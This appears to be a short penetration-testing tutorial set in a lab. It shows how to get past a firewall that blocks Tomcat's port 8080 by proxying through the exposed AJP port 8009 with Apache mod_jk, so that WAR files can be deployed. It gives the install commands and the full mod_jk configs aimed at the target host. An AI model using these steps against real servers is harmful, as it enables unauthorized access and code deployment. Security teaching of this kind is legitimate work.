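When you install Tomcat you see the screen below. We usually deploy WAR files through the default port, 8080.
But when port 8080 is blocked by a firewall, is there still a way to make use of the server?
The answer is yes: it can be done through the AJP port, 8009. The steps follow one by one.
The lab environment is:
192.168.0.102   virtual machine running Tomcat 7, with port 8080 blocked by the firewall
192.168.0.103   penetration-testing host running BT5
First, an nmap scan shows that port 8009 is open.
BT5 ships with apache2 installed by default, so we only need to install mod-jk: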
#!shell
[email protected]:~# apt-get install libapache2-mod-jk
The jk.conf configuration file is as follows:
#!shell
[email protected]:/etc/apache2/mods-available# cat jk.conf
# Update this path to match your conf directory location
JkWorkersFile /etc/apache2/jk_workers.properties
# Where to put jk logs
# Update this path to match your logs directory location
JkLogFile /var/log/apache2/mod_jk.log
# Set the jk log level [debug/error/info]
JkLogLevel info
# Select the log format
JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
# JkOptions indicate to send SSL KEY SIZE,
JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
# JkRequestLogFormat set the request format
JkRequestLogFormat "%w %V %T"
# Shm log file
JkShmFile /var/log/apache2/jk-runtime-status
Symlink jk.conf into the /etc/apache2/mods-enabled/ directory:
#!shell
ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf
Configure jk_workers.properties:
#!shell
[email protected]:/etc/apache2# cat jk_workers.properties
worker.list=ajp13
# Set properties for worker named ajp13 to use ajp13 protocol,
# and run on port 8009
worker.ajp13.type=ajp13
# The host below is the IP address of the target machine
worker.ajp13.host=192.168.0.102
worker.ajp13.port=8009
worker.ajp13.lbfactor=50
worker.ajp13.cachesize=10
worker.ajp13.cache_timeout=600
worker.ajp13.socket_keepalive=1
worker.ajp13.socket_timeout=300
Configuration of the default site:
Restart Apache:
#!shell
sudo a2enmod proxy_ajp
sudo a2enmod proxy_http
sudo /etc/init.d/apache2 restart
Apache's mod_jk module is now configured. Requests to port 80 on 192.168.0.103 are forwarded to port 8009 on 192.168.0.102, and from there the WAR can be deployed.
If you are interested in penetration testing, add me and let's talk more :)